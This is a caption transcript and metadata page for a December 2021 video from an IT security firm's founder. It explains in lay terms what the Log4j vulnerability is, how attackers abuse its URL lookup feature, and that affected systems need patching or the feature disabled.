What is log4j and why should you care?

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey it's david ruddock founder and managing director of insane technologies i wanted to talk to you very quickly about what this whole log 4j thing is um why it is uh melting down the internet at this point in time how it works why you should care and what you can do so really really quickly log 4j that's log numeral 4 j is a piece of software leveraged by programmers to help them when they are logging data in their application and logging data basically means like keeping a diary of the activities or actions performed in the application that can be for security reasons like uh looking at the various authentications that have happened so that maybe you can log uh malicious activity it could also be for uh you know keeping a record of things that have happened in the application uh for debugging purposes or just just to generally know what the application has been doing it's pretty common and it's really used in lots and lots of applications particularly applications that are written in the java program programming language which is a lot and just briefly listing off a number of the applications that use this twitter steam tesla a lot of what's called apache applications apache is a foundation they write a lot of software struts solar and druid readers which is a database caching application elasticsearch which is a big uh log data collection platform and analytics platform which used in many many things uh and minecraft in fact the the story goes that essentially this has been used by minecraft players to sort of like uh attack uh other people on on the server and it's weird that all these things sort of start with video gamers but you know essentially the way it works is what has been written into the log4j library is that if it sees something that points to a web address it will try and download the content of that web address and execute it and there are valid reasons for this uh your website uh your business website probably reaches out to other web addresses to pull in things like fonts or maybe style sheets you know the way that the the thing looks uh so this is pretty common although for it to be within the logging mechanism of an application and be able to be accessed and called upon so easily is a little bit weird this this should have been disabled by default and you should have had to explicitly turn it on what's been done in in log4j is that it's on by default and you have to explicitly turn it off so the way in which it's exploited is that anyone who either attempts to connect to a web server running uh log4j in the background can either send in the request uh a web address to uh go collect some malicious code from or even you know you go to www.insane.net you and in the contact us form maybe you type in the malicious url there the website then pushes that little bit of code into the log4j mechanism log4j then looks up that web address downloads and then executes that malicious code now this is already being weaponized uh we've seen actively over the weekend a number of ip addresses uh attempting to exploit uh numerous websites that we run that our clients run thus far nothing has uh shown up we have seen some crypto miners try to be run that's something that tries to generate crypto coin or cryptocurrency like bitcoin ethereum uh automatically uh we're also seeing uh malicious payloads already for malware to happen so the worst case scenario that could happen from this is that your system is compromisable they insert code into a form or into a web request to one of the things that your business runs that is accessible from the web and it downloads and executes say a remote access trojan think team viewer but for bad guys that would then allow them to take control of the system that they've compromised and from there they could either move laterally through your business uh ransomware your business steal your data do all sorts of horrible horrible things the fix for this is that a lot of software vendors are releasing patches to fix it uh it it's also possible just to go in and change the settings to explicitly deny the feature uh so there is a lot you can do if you are currently uncertain whether or not um your system may uh may be susceptible to this i i can tell you that ubiquity unified controllers need to be patched straight away uh 40 same 40 net 40 seam is apparently uh vulnerable a bunch of tp-link related controller software is vulnerable there's a lot of things that are vulnerable um vmware vsphere esxi which is a hypervisor virtualization platform is vulnerable like there's a reason why the internet is melting down over this it's a pretty serious vulnerability uh if you have any concerns reach out our incident response team has a playbook for this already built out we've been checking all of our clients all weekend as i said so far nothing nothing has shown up which is really really good news uh but you know we're here for you if you've got any questions about this particular exploit or any other vulnerabilities or security questions i would love to hear from you anyway stay safe see you later

Info

Channel: Insane Technologies

Views: 8,297

Rating: undefined out of 5

Keywords:

Id: QseOehu_9IE

Channel Id: undefined

Length: 6min 10sec (370 seconds)

Published: Mon Dec 13 2021